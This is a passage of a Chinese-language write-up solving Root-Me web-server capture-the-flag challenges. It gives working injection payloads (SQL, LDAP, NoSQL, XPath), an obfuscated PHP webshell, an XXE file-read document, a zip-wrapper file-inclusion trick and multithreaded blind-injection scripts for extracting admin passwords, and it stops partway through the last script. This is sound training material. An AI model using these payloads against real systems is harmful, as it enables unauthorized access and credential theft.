<h2 id="31-SQL-injection-authentication"><a href="#31-SQL-injection-authentication" class="headerlink" title="31.SQL injection - authentication"></a>31.SQL injection - authentication</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch9/" title="http://challenge01.root-me.org/web-serveur/ch9/">http://challenge01.root-me.org/web-serveur/ch9/</a> &amp;#x20;<br>[+]Statement:获取管理员的密码 &amp;#x20;<br>[+]Solution:无任何过滤的注入，通过order by参数可以控制登录的用户，审查元素获得密码 &amp;#x20;<br>[+]Payload:login&#x3D;123#&amp;password&#x3D;1’ or ‘1’&#x3D;’1’ order by 1 –+</p>
<h2 id="32-SQL-injection-authentication-GBK"><a href="#32-SQL-injection-authentication-GBK" class="headerlink" title="32.SQL injection - authentication - GBK"></a>32.SQL injection - authentication - GBK</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch42/" title="http://challenge01.root-me.org/web-serveur/ch42/">http://challenge01.root-me.org/web-serveur/ch42/</a> &amp;#x20;<br>[+]Statement:获取管理员的密码 &amp;#x20;<br>[+]Solution:根据题目判断是宽字节注入，所以利用%df逃逸PHP函数的转译。 &amp;#x20;<br>[+]Payload:login&#x3D;%bf’ or 1&#x3D;1 – -&amp;password&#x3D;abc</p>
<h2 id="33-SQL-injection-string"><a href="#33-SQL-injection-string" class="headerlink" title="33.SQL injection - string"></a>33.SQL injection - string</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch19/" title="http://challenge01.root-me.org/web-serveur/ch19/">http://challenge01.root-me.org/web-serveur/ch19/</a> &amp;#x20;<br>[+]Statment:获取管理员密码 &amp;#x20;<br>[+]Solution:测试网页，发现在action&#x3D;recherche页面可以使用union函数注入，并且有回显。一步步构造Payload获取管理员密码 &amp;#x20;<br>[+]Payload:</p>
<blockquote>
<p>recherche&#x3D;1’ union select 1,name FROM sqlite_master where tpye&#x3D;’table’–+<br>recherche&#x3D;1’ union select 1,sql FROM sqlite_master where type&#x3D;’table’ –+<br>recherche&#x3D;1’ union select username,password FROM users  –+</p>
</blockquote>
<h2 id="34-LDAP-injection-authentication"><a href="#34-LDAP-injection-authentication" class="headerlink" title="34.LDAP injection - authentication"></a>34.LDAP injection - authentication</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch25/" title="http://challenge01.root-me.org/web-serveur/ch25/">http://challenge01.root-me.org/web-serveur/ch25/</a><br>[+]Statement:绕过验证<br>[+]Solution:根据题目提示为LDAP注入，LDAP是一种轻量级目录协议，主要用于资源查询。输入 username&#x3D;<em>)(%26&amp;password&#x3D;111发现页面报错，并给出了查询的结构，根据给出查询结构，构造Payload，即可绕过<br>[+]Payload:username&#x3D;</em>)(|(userPassword&#x3D; *&amp;password&#x3D;1)</p>
<h2 id="35-NoSQL-injection-authentication"><a href="#35-NoSQL-injection-authentication" class="headerlink" title="35.NoSQL injection - authentication"></a>35.NoSQL injection - authentication</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch38/" title="http://challenge01.root-me.org/web-serveur/ch38/">http://challenge01.root-me.org/web-serveur/ch38/</a><br>[+]Statement:找到隐藏用户的用户名<br>[+]Solution:题目提示NoSQL注入，查询资料了解mongodb的基本命令和注入方法。了解到$ne为!&#x3D;符号，构造payload可以形成重言式注入。构造Payload如下: &amp;#x20;</p>
<blockquote>
<p>login[$ne]&#x3D;123&amp;pass[$ne]&#x3D;123</p>
</blockquote>
<p>它在服务器端会被解释为{‘login’&#x3D;&gt;{‘$ne’&#x3D;&gt;’123’},’pass’&#x3D;&gt;{‘$ne’&#x3D;&gt;’123’}}，从单一目标查询变成了条件查询，形成永真式。此时页面返回You are connected as:admin。并没有给出flag。于是更改Payload如下： &amp;#x20;</p>
<blockquote>
<p>login[$ne]&#x3D;admin&amp;pass[$ne]&#x3D;123</p>
</blockquote>
<p>页面此时返回You are connected as:test。这个用户也不是隐藏用户。于是使用mongodb的正则表达式筛选非admin或者test用户。Payload如下 &amp;#x20;</p>
<blockquote>
<p>login[$regex]&#x3D;^[^(a|t)]&amp;pass[$ne]&#x3D;1</p>
</blockquote>
<p>即可得到flag。</p>
<h2 id="36-Path-Truncation"><a href="#36-Path-Truncation" class="headerlink" title="36.Path Truncation"></a>36.Path Truncation</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch35/" title="http://challenge01.root-me.org/web-serveur/ch35/">http://challenge01.root-me.org/web-serveur/ch35/</a><br>[+]Statement:获取进入管理员空间的方法<br>[+]Solution:根据提示得知是路径截断，结合PHP limit提示，查询资料得知在</p>
<blockquote>
<p>page&#x3D;a&#x2F;..&#x2F;admin.html&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;</p>
</blockquote>
<h2 id="37-PHP-Serialization"><a href="#37-PHP-Serialization" class="headerlink" title="37.PHP Serialization"></a>37.PHP Serialization</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch28/" title="http://challenge01.root-me.org/web-serveur/ch28/">http://challenge01.root-me.org/web-serveur/ch28/</a><br>[+]Statement:获取管理员的访问权限<br>[+]Solution:可以看到源码，分析源码逻辑。最终目的是要使$_SESSION[‘login’]&#x3D;admin。其中关键变量$data有两种赋值方式，一种是通过传入的POST参数赋值，另一种是从cookie里的autologin的值反序列化得到。下面的验证逻辑是比较$data[‘password’]=&#x3D;$auth[$data[‘login’]],后者的值应该为一个字符串，而这里可以里用&#x3D;&#x3D;的弱类型比较，使$data[‘password’]的值为true，即可绕过比较。因此构造php页面如下 &amp;#x20;</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$data[&#x27;login&#x27;]=&#x27;superadmin&#x27;;</span><br><span class="line">$data[&#x27;password&#x27;]=true;</span><br><span class="line">echo(urlencode(serialize($data)));</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>构造Cookie如下，并且去掉POST的两个参数，即可绕过。 &amp;#x20;<br>[+]Payload:Cookie:autologin&#x3D;a%3A2%3A%7Bs%3A5%3A%22login%22%3Bs%3A10%3A%22superadmin%22%3Bs%3A8%3A%22password%22%3Bb%3A1%3B%7D</p>
<h2 id="38-SQL-injection-numeric"><a href="#38-SQL-injection-numeric" class="headerlink" title="38.SQL injection - numeric"></a>38.SQL injection - numeric</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch18/" title="http://challenge01.root-me.org/web-serveur/ch18/">http://challenge01.root-me.org/web-serveur/ch18/</a><br>[+]Statement:获取管理员的密码<br>[+]Solution:当输入1‘时，发现会报错，提示存在\，判断应该是加了waf过滤。根据题目提示，为数字型注入，因此不使用单双引号进行注入。<br>[+]Payload: &amp;#x20;</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">action=news&amp;news_id=4%20union%20select%201,name,sql%20from%20sqlite_master</span><br><span class="line">action=news&amp;news_id=4%20union%20select%201,username,password%20from%20users</span><br></pre></td></tr></table></figure>

<h2 id="39-SQL-Injection-Routed"><a href="#39-SQL-Injection-Routed" class="headerlink" title="39.SQL Injection - Routed"></a>39.SQL Injection - Routed</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch49/" title="http://challenge01.root-me.org/web-serveur/ch49/">http://challenge01.root-me.org/web-serveur/ch49/</a><br>[+]Statement:找到管理员的密码<br>[+]Solution:题目的意思为路由注入，也就跟二次注入差不多，查看页面逻辑，第一个页面怎么登录都显示账户或密码错误，第二个页面发现可以注入，当输入’union select 1时，页面的第二行数据显示为1，根据提示，再在联合查询后跟一个子联合查询，并且使用16进制表示以绕过waf。由于直接查询读数我这里老出语法错误，因此我使用基于报错的查询方式构造Payload，一步步读出密码<br>[+]Payload:（需要16进制编码） &amp;#x20;</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#x27;union select concat(0x7e,database(),0x7e),0 or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=&quot;c_webserveur_49&quot; ),0x7e),1)&#x27;--+</span><br><span class="line">&#x27;union select concat(0x7e,database(),0x7e),0 or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=&quot;users&quot; ),0x7e),1)&#x27;--+</span><br><span class="line">&#x27;union select concat(0x7e,database(),0x7e),0 or updatexml(1,concat(0x7e,(select concat_ws(&#x27;:&#x27;,login,password) from users limit 1),0x7e),1)&#x27;--+</span><br></pre></td></tr></table></figure>

<h2 id="40-PHP-Eval"><a href="#40-PHP-Eval" class="headerlink" title="40.PHP - Eval"></a>40.PHP - Eval</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch57/" title="http://challenge01.root-me.org/web-serveur/ch57/">http://challenge01.root-me.org/web-serveur/ch57/</a><br>[+]Statement:找到这个服务器的漏洞并利用。flag在.passwd文件中。<br>[+]Solution:题目给出了源码，大致意思是需要构造一个没有字母和反斜杠的webshell，之前看<a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html" title="P总的文章">P总的文章</a>里有详细介绍无字母数字的webshell构造方法，利用位运算里的取反操作符～可以把汉字里某些字符变成字母，利用这个特性，构造出Payload，可构造出webshell。<br>[+]Payload: &amp;#x20;</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">input=$__=(&#x27;&gt;&#x27;&gt;&#x27;&lt;&#x27;)+(&#x27;&gt;&#x27;&gt;&#x27;&lt;&#x27;);$_=$__/$__;$____=&#x27;&#x27;;$___=&quot;瞰&quot;;$____.=~($___&#123;$_&#125;);$___=&quot;和&quot;;$____.=~($___&#123;$__&#125;);$___=&quot;和&quot;;$____.=~($___&#123;$__&#125;);$___=&quot;的&quot;;$____.=~($___&#123;$_&#125;);$___=&quot;半&quot;;$____.=~($___&#123;$_&#125;);$___=&quot;始&quot;;$____.=~($___&#123;$__&#125;);$_____=&#x27;_&#x27;;$___=&quot;俯&quot;;$_____.=~($___&#123;$__&#125;);$___=&quot;瞰&quot;;$_____.=~($___&#123;$__&#125;);$___=&quot;次&quot;;$_____.=~($___&#123;$_&#125;);$___=&quot;站&quot;;$_____.=~($___&#123;$_&#125;);$_=$$_____;$____($_[$__]);&amp;2=system(&#x27;cat .passwd&#x27;)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="41-XML-External-Entity"><a href="#41-XML-External-Entity" class="headerlink" title="41.XML External Entity"></a>41.XML External Entity</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch29/" title="http://challenge01.root-me.org/web-serveur/ch29/">http://challenge01.root-me.org/web-serveur/ch29/</a><br>[+]Statement:获取管理员的密码<br>[+]Solution:题目考察XXE(外部实体注入)，打开页面是一个在线检测网页是不是合法的RSS格式的页面，可以输入文件的地址。于是在vps上创建一个xsl文件，在里面加入xxePayload，并加上合法的RSS文件格式，在W3CSchool可以找到。输入网址，可以实现文件读取。<br>[+]Payload: &amp;#x20;</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot; ?&gt;</span><br><span class="line">&lt;!DOCTYPE r [</span><br><span class="line">&lt;!ELEMENT r ANY &gt;</span><br><span class="line">&lt;!ENTITY sp SYSTEM &quot;php://filter/read=convert.base64-encode/resource=index.php&quot;&gt;</span><br><span class="line">]&gt;</span><br><span class="line">&lt;rss version=&quot;2.0&quot;&gt;</span><br><span class="line">&lt;channel&gt;</span><br><span class="line">  &lt;title&gt;&amp;sp;&lt;/title&gt;</span><br><span class="line">  &lt;link&gt;https://www.w3schools.com&lt;/link&gt;</span><br><span class="line">  &lt;description&gt;Free web building tutorials&lt;/description&gt;</span><br><span class="line">  &lt;item&gt;</span><br><span class="line">    &lt;title&gt;&amp;sp;&lt;/title&gt;</span><br><span class="line">    &lt;link&gt;https://www.w3schools.com/xml/xml_rss.asp&lt;/link&gt;</span><br><span class="line">    &lt;description&gt;New RSS tutorial on W3Schools&lt;/description&gt;</span><br><span class="line">  &lt;/item&gt;</span><br><span class="line">  &lt;item&gt;</span><br><span class="line">    &lt;title&gt;XML Tutorial&lt;/title&gt;</span><br><span class="line">    &lt;link&gt;https://www.w3schools.com/xml&lt;/link&gt;</span><br><span class="line">    &lt;description&gt;New XML tutorial on W3Schools&lt;/description&gt;</span><br><span class="line">  &lt;/item&gt;</span><br><span class="line">&lt;/channel&gt;</span><br><span class="line">&lt;/rss&gt;</span><br></pre></td></tr></table></figure>

<h2 id="42-SQL-Truncation"><a href="#42-SQL-Truncation" class="headerlink" title="42.SQL Truncation"></a>42.SQL Truncation</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch36/" title="http://challenge01.root-me.org/web-serveur/ch36/">http://challenge01.root-me.org/web-serveur/ch36/</a><br>[+]Statement:找到进入管理员空间的方法<br>[+]Solution:利用sql截断的特性。在页面的源码里给出了创建表的sql语句。可以看到用户名只有12位，当我们注册如下账户admin a时，mysql会默认截断12位后的a，当服务器的配置不当时，我们此时就已经修改了admin的密码。</p>
<h2 id="43-XPath-injection-authentication"><a href="#43-XPath-injection-authentication" class="headerlink" title="43.XPath injection - authentication"></a>43.XPath injection - authentication</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch23/" title="http://challenge01.root-me.org/web-serveur/ch23/">http://challenge01.root-me.org/web-serveur/ch23/</a><br>[+]Statement:找到管理员的密码<br>[+]Solution:Xpath类型的认证注入，构造永真式，同时根据member页面显示的管理员的用户名，构造payload，获取管理员权限<br>[+]Payload:username&#x3D;John or ‘1’&#x3D;’1&amp;password&#x3D;123</p>
<h2 id="44-Local-File-Inclusion-Wrappers"><a href="#44-Local-File-Inclusion-Wrappers" class="headerlink" title="44.Local File Inclusion - Wrappers"></a>44.Local File Inclusion - Wrappers</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch43/" title="http://challenge01.root-me.org/web-serveur/ch43/">http://challenge01.root-me.org/web-serveur/ch43/</a><br>[+]Statement:找到flag<br>[+]Solution:这是一个结合文件上传、文件包含和伪协议的题。通过使用<a target="_blank" rel="noopener" href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#wrapper-zip" title="github上的zip文件上传payload">github上的zip文件上传payload</a>，绕过图片类型检测，并通过执行代码里的show_source(‘index.php’)，查看到源码。但发现服务器禁止了外部命令执行的函数。通过列目录，发现flag文件，再用show_source查看flag文件。<br>[+]Payload: &amp;#x20;</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">echo &#x27;&lt;pre&gt;&lt;?php</span><br><span class="line">function get_allfiles($path,&amp;$files)</span><br><span class="line">&#123;</span><br><span class="line">    if(is_dir($path))</span><br><span class="line">    &#123;</span><br><span class="line">        $dp = dir($path);</span><br><span class="line">        while ($file = $dp -&gt;read())</span><br><span class="line">        &#123;</span><br><span class="line">            if($file !== &quot;.&quot; &amp;&amp; $file !== &quot;..&quot;)</span><br><span class="line">            &#123;</span><br><span class="line">                get_allfiles($path.&quot;/&quot;.$file, $files);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        $dp -&gt;close();</span><br><span class="line">    &#125;</span><br><span class="line">    if(is_file($path))</span><br><span class="line">    &#123;</span><br><span class="line">        $files[] =  $path;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">function get_filenamesbydir($dir)</span><br><span class="line">&#123;</span><br><span class="line">    $files =  array();</span><br><span class="line">    get_allfiles($dir,$files);</span><br><span class="line">    return $files;</span><br><span class="line">&#125;</span><br><span class="line">$filenames = get_filenamesbydir(&quot;./&quot;);</span><br><span class="line">//打印所有文件名，包括路径</span><br><span class="line">foreach ($filenames as $value)</span><br><span class="line">&#123;</span><br><span class="line">    echo $value, PHP_EOL;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;&lt;/pre&gt;</span><br><span class="line">&#x27; &gt; a.php;</span><br><span class="line">zip payload.zip a.php;</span><br><span class="line">mv payload.zip payload.jpg;</span><br><span class="line">http://challenge01.root-me.org/web-serveur/ch43/index.php?page=zip://tmp/upload/3rqsJvyOk.jpg%23a</span><br></pre></td></tr></table></figure>


<h2 id="45-SQL-injection-Error"><a href="#45-SQL-injection-Error" class="headerlink" title="45.SQL injection - Error"></a>45.SQL injection - Error</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch34/" title="http://challenge01.root-me.org/web-serveur/ch34/">http://challenge01.root-me.org/web-serveur/ch34/</a><br>[+]Statement:找到管理员的密码<br>[+]Solution:页面的第一个页面无法注入。但第二个页面的order参数可以注入。利用sqlmap可以注入出数据。<br>[+]Payload:action&#x3D;contents&amp;order&#x3D;ASC,(SELECT (CASE WHEN (8970&#x3D;8970) THEN 1 ELSE 1&#x2F;(SELECT 0) END))</p>
<h2 id="46-SQL-injection-Insert"><a href="#46-SQL-injection-Insert" class="headerlink" title="46.SQL injection - Insert"></a>46.SQL injection - Insert</h2><h2 id="47-XSLT-Code-execution"><a href="#47-XSLT-Code-execution" class="headerlink" title="47.XSLT - Code execution"></a>47.XSLT - Code execution</h2><h2 id="48-Java-Spring-Boot"><a href="#48-Java-Spring-Boot" class="headerlink" title="48.Java - Spring Boot"></a>48.Java - Spring Boot</h2><h2 id="49-SQL-injection-file-reading"><a href="#49-SQL-injection-file-reading" class="headerlink" title="49.SQL injection - file reading"></a>49.SQL injection - file reading</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch31/" title="http://challenge01.root-me.org/web-serveur/ch31/">http://challenge01.root-me.org/web-serveur/ch31/</a><br>[+]Statement:找到管理员的密码<br>[+]Solution:member页面的id参数可以注入，使用union select可以读到表里的member密码。但是并不是正确的密码。按照题目要求，需要读文件。使用load_file()函数读取，猜测文件路径，最后确定为&#x2F;challenge&#x2F;web-serveur&#x2F;ch31&#x2F;index.php，这里因为单双引号被过滤了，所以使用16进制表示。然后可以读到index.php源码。源码里给出了从数据库里的密码到和输入比较的字符串的解密函数，在本地利用这个函数计算出真实密码值，另外注意到源码里是输入的sha1值等于这个值，所以在在线的sha1解密网站解密这个值，得到最终的密码<br>[+]Payload: &amp;#x20;</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://challenge01.root-me.org/web-serveur/ch31/?action=members&amp;id=-1 union select load_file(0x2f6368616c6c656e67652f7765622d736572766575722f636833312f696e6465782e706870),2,3,4-- +</span><br></pre></td></tr></table></figure>

<h2 id="50-XPath-injection-string"><a href="#50-XPath-injection-string" class="headerlink" title="50.XPath injection - string"></a>50.XPath injection - string</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch27/" title="http://challenge01.root-me.org/web-serveur/ch27/">http://challenge01.root-me.org/web-serveur/ch27/</a><br>[+]Statement:获取管理员密码<br>[+]Solution:在member页面可以注入，并且测试发现会出现输入语句的报错，构造payload可以读到用户名和密码。一对一对测试可以找到管理员账号。<br>[+]Payload: &amp;#x20;</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#x27;) or (&#x27;1&#x27;=&#x27;1</span><br><span class="line">1&#x27; or &#x27;1&#x27;=&#x27;1&#x27;)]|//user/password[contains(.,&#x27;</span><br></pre></td></tr></table></figure>

<h2 id="51-NoSQL-injection-blind"><a href="#51-NoSQL-injection-blind" class="headerlink" title="51.NoSQL injection - blind"></a>51.NoSQL injection - blind</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch48/" title="http://challenge01.root-me.org/web-serveur/ch48/">http://challenge01.root-me.org/web-serveur/ch48/</a><br>[+]Statement:这是一个web应用，找到nosqlblind的flag<br>[+]Solution:在name输入nosqlblind，利用基于布尔类型的注入，使用regex一位一位的进行注入，最终可以得到flag。<br>[+]Payload: &amp;#x20;</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"> import requests,threading,queue,time,string</span><br><span class="line">SHARE_Q=queue.Queue()</span><br><span class="line">payload=&quot;&quot;</span><br><span class="line">next=False</span><br><span class="line">class worker(threading.Thread):</span><br><span class="line">	def __init__(self,func):</span><br><span class="line">		threading.Thread.__init__(self)</span><br><span class="line">		self.func=func</span><br><span class="line">	def run(self):</span><br><span class="line">		self.func()</span><br><span class="line">def scan():</span><br><span class="line">	global SHARE_Q</span><br><span class="line">	global payload</span><br><span class="line">	global next</span><br><span class="line">	if next==True:</span><br><span class="line">		next=False</span><br><span class="line">		return</span><br><span class="line">	url=&quot;http://challenge01.root-me.org/web-serveur/ch48/index.php?chall_name=nosqlblind&amp;flag[$regex]=^(&#123;&#125;)&quot;</span><br><span class="line">	while not SHARE_Q.empty():</span><br><span class="line">		i=SHARE_Q.get(timeout=1)</span><br><span class="line">		print(&#x27;[url]:&#x27;+payload+i)</span><br><span class="line">		r=requests.get(url.format(payload+i))</span><br><span class="line">		if &#x27;Yeah&#x27; in r.text:</span><br><span class="line">			payload+=i</span><br><span class="line">			print(&#x27;[payload]:&#x27;+payload)</span><br><span class="line">			SHARE_Q.queue.clear()</span><br><span class="line">			next=True</span><br><span class="line">			SHARE_Q.task_done()</span><br><span class="line">			return</span><br><span class="line">	SHARE_Q.task_done()</span><br><span class="line">def main():</span><br><span class="line">	global SHARE_Q</span><br><span class="line">	threads=[]</span><br><span class="line">	while True:</span><br><span class="line">		for i in string.printable[:-6]:</span><br><span class="line">			if i in &#x27;*.?+$^[]()&#123;&#125;|\\/&#x27;:</span><br><span class="line">				SHARE_Q.put(&#x27;\\&#x27;+i)</span><br><span class="line">			else:</span><br><span class="line">				SHARE_Q.put(i)</span><br><span class="line">		for i in range(10):</span><br><span class="line">			thread=worker(scan)</span><br><span class="line">			thread.start()</span><br><span class="line">			threads.append(thread)</span><br><span class="line">		for thread in threads:</span><br><span class="line">			thread.join()</span><br><span class="line">		SHARE_Q.join()</span><br><span class="line">if __name__ == &#x27;__main__&#x27;:</span><br><span class="line">	main()</span><br></pre></td></tr></table></figure>

<h2 id="52-SQL-injection-Time-based"><a href="#52-SQL-injection-Time-based" class="headerlink" title="52.SQL injection - Time based"></a>52.SQL injection - Time based</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch40/" title="http://challenge01.root-me.org/web-serveur/ch40/">http://challenge01.root-me.org/web-serveur/ch40/</a><br>[+]Statement:获取管理员密码<br>[+]Solution:在member页面可以注入，根据提示只能时间注入，放在sqlmap里跑即可。<br>[+]Payload: &amp;#x20;</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python sqlmap.py -u &quot;http://challenge01.root-me.org/web-serveur/ch40/?action=member&amp;member=1&quot; -v3 -D public -T users --dump</span><br></pre></td></tr></table></figure>

<h2 id="53-SQL-injection-blind"><a href="#53-SQL-injection-blind" class="headerlink" title="53.SQL injection - blind"></a>53.SQL injection - blind</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch10/" title="http://challenge01.root-me.org/web-serveur/ch10/">http://challenge01.root-me.org/web-serveur/ch10/</a><br>[+]Statement:获得管理员密码<br>[+]Solution:这个页面注册时可以注入登录，因此可以利用基于boolen的注入一步步猜解出数据库信息<br>[+]Payload:盲注脚本如下 &amp;#x20;</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></td><td class="code"><pre><span class="line">import requests,string,threading,queue,time</span><br><span class="line">url=&quot;http://challenge01.root-me.org/web-serveur/ch10/&quot;</span><br><span class="line">username=&#x27;&#x27;</span><br><span class="line">password=&#x27;&#x27;</span><br><span class="line">payload=&#x27;&#x27;</span><br><span class="line">next=False</span><br><span class="line">class myThread(threading.Thread):</span><br><span class="line">    &quot;&quot;&quot;docstring for myThread&quot;&quot;&quot;</span><br><span class="line">    def __init__(self, func,queue):</span><br><span class="line">        super(myThread, self).__init__()</span><br><span class="line">        self.func=func</span><br><span class="line">        self.queue=queue</span><br><span class="line">    def run(self):</span><br><span class="line">        while True:</span><br><span class="line">            data=self.queue.get()</span><br><span class="line">            self.func(data)</span><br><span class="line">            self.queue.task_done()</span><br><span class="line">def work(data):</span><br><span class="line">    i,j,k=data</span><br><span class="line">    global next,payload</span><br><span class="line">    #username=&quot;1&#x27; or substr((select sql FROM sqlite_master where type=&#x27;table&#x27;),&#123;&#125;,1)=&#x27;&#123;&#125;&#x27; --+&quot;.format(j,i)</span><br><span class="line">    username=&quot;1&#x27; or substr((select username||&#x27;:&#x27;||password FROM  users limit &#123;&#125;,1),&#123;&#125;,1)=&#x27;&#123;&#125;&#x27; 